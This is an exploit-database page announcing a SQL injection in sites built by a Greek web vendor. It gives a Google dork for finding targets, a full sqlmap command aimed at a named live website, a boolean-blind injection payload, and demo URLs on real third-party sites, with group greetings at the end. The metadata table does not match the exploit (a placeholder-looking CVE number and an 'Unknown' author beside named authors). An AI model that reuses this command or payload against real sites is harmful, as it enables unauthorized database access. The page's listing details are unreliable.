Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-12345 | CWE-89 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-03-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
################################################################################# # Exploit Title:ATnet Communications Sql njection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : | qualityweb inurl:cat_id= # Tested on : Kali Linux 2018.1 # Date : 11.03.2018 # Vendor Home: https://www.qualityweb.gr/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking n Google Or Other Search Enggine [+] Sqlmap Or Manuel [+] Sql GET Parameter "cat_id=" s Vulnerable [+] The Back-End DBMS is MySQL Command:root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --no-cast -u "http://www.k-soldatos.gr/view_cat.php?cat_id=15" --tamper=space2comment --dbms=Mysql --batch --dbs -f Parameter: cat_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cat_id=-3838) OR 3290=3290-- FBTw Demo Sql: http://www.k-soldatos.gr/view_cat.php?cat_id=15 http://www.greekradios.gr/radios_cat.asp?cat_id=7 Greet'Zzz :TrazeR & Zer0day & Gcebe & Kutluhan & R4PTOR
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.